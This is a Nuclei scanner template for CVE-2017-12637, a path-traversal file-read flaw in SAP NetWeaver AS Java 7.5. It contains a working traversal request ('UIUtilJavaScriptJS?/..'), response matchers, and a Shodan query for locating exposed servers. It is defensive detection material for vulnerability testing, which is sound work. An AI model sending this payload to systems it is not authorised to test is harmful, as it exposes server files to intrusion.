nuclei-templates/http/cves/2017/CVE-2017-12637.yaml

49 lines
1.9 KiB
YAML

id: CVE-2017-12637
info:
name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
author: apt-mirror
severity: high
description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
remediation: |
Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
reference:
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
- https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- http://www.sh0w.top/index.php/archives/7/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-12637
cwe-id: CWE-22
epss-score: 0.00648
epss-percentile: 0.76985
cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: netweaver_application_server_java
shodan-query: http.favicon.hash:-266008933
tags: cve,cve2017,sap,lfi,java,traversal
http:
- method: GET
path:
- "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."
matchers-condition: and
matchers:
- type: word
part: body
words:
- "WEB-INF"
- "META-INF"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022035506eedf53b125fff050e0ca9b705d4987d045ad81f6c601ab61a7c0bc62d3d02207ffd771bd3627ed5083fb470995b02456c1d2632a21118f238cfd614fcbb4246:922c64590222798bb761d5b6d8e72950